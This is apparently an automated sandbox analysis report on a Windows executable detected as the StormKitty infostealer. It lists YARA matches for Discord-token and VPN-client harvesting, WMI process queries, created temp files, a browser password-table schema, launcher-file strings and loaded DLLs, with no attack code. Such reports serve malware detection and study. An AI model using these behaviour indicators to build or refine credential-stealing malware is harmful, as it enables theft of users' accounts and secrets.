Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-u1bugrxr.tmp.0.dr	Zip Entry: encrypted

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_0101EB48	0_2_0101EB48
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_01013C98	0_2_01013C98
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_01016CD8	0_2_01016CD8
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_0101C458	0_2_0101C458
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_010187D0	0_2_010187D0
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_010187E0	0_2_010187E0
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_010119C0	0_2_010119C0
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_010119D0	0_2_010119D0
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_0101C8B0	0_2_0101C8B0
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_0101EB39	0_2_0101EB39
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_01013C89	0_2_01013C89
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_013229BA	0_2_013229BA
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_01325858	0_2_01325858
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_01320040	0_2_01320040
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_0132CAA1	0_2_0132CAA1
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_01323DD0	0_2_01323DD0
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_013247B8	0_2_013247B8
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_0132BE02	0_2_0132BE02
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_0132EE00	0_2_0132EE00
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_01320006	0_2_01320006
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_01325D91	0_2_01325D91
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_0132DC20	0_2_0132DC20
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_0132DC10	0_2_0132DC10
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_013267B8	0_2_013267B8
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_013267A8	0_2_013267A8
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_0132F698	0_2_0132F698
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_01332C10	0_2_01332C10
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_01332EEF	0_2_01332EEF
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_01330006	0_2_01330006
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_01332C04	0_2_01332C04
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_01330040	0_2_01330040
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_01334B08	0_2_01334B08
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_013347B1	0_2_013347B1
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_013347C0	0_2_013347C0
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_01330640	0_2_01330640
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_01334AF8	0_2_01334AF8
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_05960988	0_2_05960988
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_059656A8	0_2_059656A8
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_0596C458	0_2_0596C458
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_0596C448	0_2_0596C448
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_059603E8	0_2_059603E8
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_05960979	0_2_05960979
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_05965698	0_2_05965698
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_01333440	0_2_01333440
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Code function: 0_2_013312D8	0_2_013312D8

Source: vEtDFkAZjO.exe, 00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameStub.exe& vs vEtDFkAZjO.exe
Source: vEtDFkAZjO.exe, 00000000.00000002.1611616512.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs vEtDFkAZjO.exe
Source: vEtDFkAZjO.exe	Binary or memory string: OriginalFilenameStub.exe& vs vEtDFkAZjO.exe

Source: vEtDFkAZjO.exe, type: SAMPLE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: vEtDFkAZjO.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: vEtDFkAZjO.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: vEtDFkAZjO.exe, type: SAMPLE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: vEtDFkAZjO.exe, type: SAMPLE	Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 0.0.vEtDFkAZjO.exe.760000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 0.0.vEtDFkAZjO.exe.760000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.0.vEtDFkAZjO.exe.760000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.0.vEtDFkAZjO.exe.760000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.0.vEtDFkAZjO.exe.760000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: 00000000.00000000.1446417255.0000000000762000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000000.00000002.1612337401.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: vEtDFkAZjO.exe PID: 6624, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions

Source: vEtDFkAZjO.exe, Help.cs

Suspicious URL: 'https://api.vimeworld.ru/user/name/'

Source: classification engine

Classification label: mal100.rans.troj.spyw.winEXE@1/83@7/6

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe

File created: C:\Users\user\AppData\Local\138727

Jump to behavior

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe

File created: C:\Users\user\AppData\Local\Temp\tmpEACC.tmp

Jump to behavior

Source: vEtDFkAZjO.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: vEtDFkAZjO.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tmpB083.tmp.dat.0.dr, tmp39BA.tmp.dat.0.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: vEtDFkAZjO.exe	Virustotal: Detection: 69%
Source: vEtDFkAZjO.exe	ReversingLabs: Detection: 78%

Source: vEtDFkAZjO.exe

String found in binary or memory: \servers.dat-launcher_profiles.json/\launcher_profiles.json

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe

File read: C:\Users\user\Desktop\vEtDFkAZjO.exe

Jump to behavior

Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\vEtDFkAZjO.exe	Section loaded: uxtheme.dll	Jump to behavior
